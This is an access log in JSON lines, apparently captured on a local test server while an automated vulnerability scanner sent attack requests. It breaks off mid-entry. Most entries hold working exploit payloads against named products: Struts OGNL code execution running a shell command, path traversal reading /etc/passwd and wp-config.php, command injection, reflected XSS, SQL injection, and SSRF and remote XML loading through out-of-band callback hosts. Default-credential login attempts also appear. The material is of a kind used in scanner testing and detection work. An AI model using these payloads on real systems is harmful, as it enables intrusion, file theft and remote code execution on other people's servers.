/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.svn/entries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=&action=edit&f1=.//./\x5C.//./\x5C.//./\x5C.//./\x5C.//./\x5C.//./etc/passwd&restore=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"\x0D\x0A\x0D\x0A _CobblerXMLRPCInterface__make_token\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uir//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"{\x22conf\x22: {\x22message\x22: \x22\x5C\x22; touch test #\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"system.listMethods","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horizon/auth/login/?next=/horizon/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /qvisdvr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/html2canvasproxy.php?url=https://c9v8hs0smpv8c6ag07h0y3hq6jz1m9xdb.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://c9v8hn0smpv8c57g0t00fa4owque3k7in.oast.live') HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /je/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /em/console/logon/logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"ant=echo md5(\x22antproxy.php\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /.antproxy.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.062","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE=%C3%82%7B%7BVS%C3%82%7D%7D&__VIEWSTATEGENERATOR=%C3%82%7B%7BVSG%C3%82%7D%7D&__EVENTVALIDATION=%C3%82%7B%7BEV%C3%82%7D%7D&txtID=uname%27&txtPW=passwd&hdnClientDPI=96","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /laravel-graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next=\x5C\x5C\x5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22arlpass\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compile.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"aps=c9v8hn0smpv8c57g0t00hdwer7id7e8x7.oast.live&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /AdminTools/querybuilder/logon?framework= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /portal-graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/44 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/45 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/46 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /community/?foro=signin&redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 